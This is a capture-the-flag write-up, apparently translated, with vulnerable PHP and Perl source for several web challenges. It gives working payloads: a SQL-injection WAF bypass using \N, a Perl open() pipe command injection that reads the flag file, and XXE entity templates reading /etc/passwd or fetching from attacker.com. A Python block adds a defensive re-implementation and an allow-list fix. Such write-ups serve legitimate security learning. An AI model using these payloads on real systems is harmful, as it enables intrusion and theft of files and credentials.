噗噗T1

Read index.pl directly to get the flag.


Information gathering

Throw it into Google.

nmap can find it too.

Metadata storage

Source code leak

The flag is leaked directly.

babysql2

I asked a more experienced player about this one after the contest; kudos to him.

<?php
include "config.php";
echo "<center><h1>Welcome to my site</h1></center><br>";
// id comes straight from the query string; it only passes through waf(), it is never cast to int
$id = $_GET['id']?waf($_GET['id']):1;
// the value is concatenated into the statement, so waf() is the only line of defence
$sql = "select * from error_news where id = $id";
echo "<!--view source /source.php-->";
$row = mysql_fetch_array(mysql_query($sql));
if (empty($row) or mysql_error()){
    echo "<center>no content detail</center>".mysql_error();
}else{
    echo "<center><table border=1><tr><th>title</th><th>Content</th></tr><tr><td>${row['title']}</td><td>${row['content']}</td></tr></table></center>";
}
function waf($var){
    if(stristr($_SERVER['HTTP_USER_AGENT'],'sqlmap')){
        echo "<center>hacker<center>";
        die();
    }
    // any run of non-letters directly followed by union/from becomes '&#160;' plus the keyword
    $var = preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var);
    return $var;
}

To inject SQL here you have to get past that waf: whenever the payload contains a non-letter character followed by `union` or `from` (for example `1 union`), that run is replaced with `&#160;$2`, i.e. the keyword with an HTML non-breaking space in front of it. I asked the senior player about this after the contest.

payload:http://118.178.18.181:57019/?id=\Nunion select%201,flag,%20\Nfrom%20flag#

`\N` is used for the bypass: the letter `N` sits directly in front of `union`/`from`, so the regex never matches, while MySQL reads `\N` as NULL, so the original statement is barely affected.

mysql> select * from users where id=\Nunion select 1,email_id,\Nfrom emails;
+----+------------------------+----------+
| id | username | password |
+----+------------------------+----------+
| 1 | Dumb@dhakkan.com | NULL |
| 1 | Angel@iloveu.com | NULL |
| 1 | Dummy@dhakkan.local | NULL |
| 1 | secure@dhakkan.local | NULL |
| 1 | stupid@dhakkan.local | NULL |
| 1 | superman@dhakkan.local | NULL |
| 1 | batman@dhakkan.local | NULL |
| 1 | admin@dhakkan.com | NULL |
+----+------------------------+----------+
8 rows in set (0.00 sec)
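As an added example (not part of the writeup), the same filter re-implemented in Python to show why `\N` slips through, next to the allow-list check a defender would use instead of a keyword blocklist; the names `waf`, `bypasses_waf` and `safe_id` are mine.

```python
import re

# Mirror of preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var):
# a run of non-letters followed by union/from is collapsed into '&#160;' + keyword.
# With the i flag the negated class [^a-z] also excludes A-Z, so a letter such as
# the N in "\N" directly before the keyword prevents any match.
WAF_PATTERN = re.compile(r'([^a-z]+)(union|from)', re.IGNORECASE)


def waf(value: str) -> str:
    """Python version of the challenge's blocklist filter."""
    return WAF_PATTERN.sub(r'&#160;\2', value)


def bypasses_waf(value: str) -> bool:
    """True when the filter leaves the input untouched although it carries a keyword."""
    has_keyword = re.search(r'union|from', value, re.IGNORECASE) is not None
    return has_keyword and waf(value) == value


def safe_id(raw, default: int = 1):
    """Allow-list replacement for waf(): id is an integer column, so accept digits only.

    Returns the integer id, the default when the parameter is absent, or None to reject.
    """
    if raw is None:
        return default
    if re.fullmatch(r'[1-9][0-9]{0,9}', raw) is None:
        return None
    return int(raw)


if __name__ == "__main__":
    # constructed inputs: a plain injection attempt and the \N variant from the writeup
    plain = "1 union select 1,flag from flag"
    tricky = "\\Nunion select 1,flag,\\Nfrom flag#"
    print(waf(plain))            # keywords get '&#160;' glued on, '#' then comments out the rest
    print(waf(tricky))           # unchanged: the blocklist regex never fires
    print(bypasses_waf(tricky))  # True
    print(safe_id(tricky))       # None: the allow-list rejects it regardless of keyword tricks
```

`safe_id` is only half of the fix; the returned integer should still go into a parameterized query rather than be concatenated into the SQL string.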

噗噗T2

Similar to one of the problems at http://www.vuln.cn/6241.

#!/usr/bin/perl
use CGI qw(:standard);
require "flag.pl";
foreach (qw(ENV BASH_ENV CDPATH IFS TERM)) {delete $ENV{$_}}; $ENV{PATH}='/bin:/usr/bin';
print header(-type=>'text/html',-charset=>"utf-8");
local $file = param('file');
local $html;
#flag{flag1_song_ni_le}
if ($file =~ /flag/i) {
    print ("not that easy\n");
    die;
}
# two-argument open: a filename that starts or ends with '|' is run as a command
open(file, "$file") || print "error: couldnt open $file : $!\n";
while (<file>) { $html .= $_; }
close(file);
print $html;

Perl's two-argument open() treats a filename that begins or ends with `|` as a command to run, so open can lead to command execution.

http://118.178.18.181:57016/index.pl?file=|pwd| # reveals the path
http://118.178.18.181:57016/index.pl?file=|`echo%20Y2F0IC92YXIvd3d3L2h0bWwvZmxhZy5wbA==%20|%20base64%20-d`| # reads the flag

readme

Kudos to the senior player once again.

First, an XXE attack is used to read files; the php:// filter wrapper reads out flag.php, which is obfuscated with phpjm. It can be decoded with an online decoder, or you can simply include it and dump the global variables.

file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php

Attached are several payload templates for XXE attacks:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "http://attacker.com/text.txt" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

findpwd is ready

The source code read out is as follows:

<?php
header("Content-Type:text/html;charset=utf8");
include "config.php";
// 1.sql
if ($_SERVER["REQUEST_METHOD"]=="GET"){
    echo include "tpl.php";
}else if ($_SERVER["REQUEST_METHOD"]=="POST"){
    $mail = mywaf($_POST['mail']);
    // the address is concatenated into the query after passing mywaf() only
    $sql = "select * from users where mail='$mail'";
    $res = mysql_query($sql);
    $row = mysql_fetch_array($res);
    if (!empty($row['password'])){
        mymail($mail);
        $output = "新的密码已经发送到您的邮箱$mail,请查收";
    }else{
        $output = "邮箱不存在,请重试";
    }
    echo include "tpl.php";
}
function mywaf($mail){
    // the local part allows whitespace, commas and single quotes in addition to letters and digits
    if(!preg_match("/^[a-z0-9\s,\-']+@([a-z0-9]+\.)+[a-z0-9]{1,5}$/i",$mail)){
        $output="非法邮箱,请重试";
        echo include "tpl.php";
        exit();
    }else{
        return $mail;
    }
}
function mymail($mail){
    mail($mail,'flag','flag{***********}');
}

1.sql is as follows:

drop database if exists fuckbean;
create database fuckbean;
use fuckbean;
create table users(
id int(5),
username varchar(20),
password varchar(32),
mail varchar(50)
);
insert into users values(1,"admin","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","admin@admin.com");
grant all privileges on fuckbean.* to fuckbean@localhost identified by 'fuckbean';

The idea then is to construct a payload so that the mail gets sent to your own mailbox.